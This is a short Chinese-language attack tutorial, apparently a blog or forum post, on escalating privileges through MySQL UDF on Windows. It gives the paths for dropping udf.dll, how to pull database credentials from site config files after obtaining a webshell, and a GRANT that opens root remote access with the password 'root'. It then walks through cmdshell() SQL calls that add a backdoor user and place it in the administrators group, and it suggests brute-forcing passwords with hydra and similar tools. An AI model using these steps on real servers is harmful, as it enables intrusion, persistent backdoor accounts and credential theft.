mysql udf提权操作
提示:上传udf.dll
小于mysql5.1版本
C:\\WINDOWS\\udf.dll 或 C:\\WINDOWS\\system32\\udf.dll
等于mysql5.1版本
%mysql%\\plugin\\udf.dll 用 select @@plugin_dir 查询plugin路径
默认 C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll
1、拿到shell后,下载网站配置文件,从中获取数据库信息(conn、config、data、sql、common、inc)
2、使用菜刀本地连接数据库
3、获取root账号密码
一、基于安全考虑root账户一般只能本地访问,但是在开发过程中可能需要打开root的远程访问权限。下面是基本的步骤:1、登录到mysql中,为root进行远程访问的授权,执行下面的命令: mysql>
mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
mysql> flush privileges;
4、通过shell查看路径(路径不有lib、plugin这两个文件夹的自己加上去)
5、执行成功新增一个udf.dll文件
6、查询用户(select cmdshell('net user');)
7、创建用户(select cmdshell('net user root 1234 /add');)
8、查询用户是否新增成功(select cmdshell('net user');)
9、查看root账户,当前权限(select cmdshell('net user root');)
10、把root账户加入管理组(select cmdshell('net localgroup administrators root /add');)
赋权后查询
11、查看当前账户权限(select cmdshell('whoami');)
获取mysql密码的方法
1、查看网站配置文件
如:conn、config、data、sql、common、inc等
2.查看数据库安装路径下的mysql文件
安装目录为/data/mysql/user.myd和user.myi
3.通过暴力破解得到(hscan、Bruter、hydra、脚本木马)
网友评论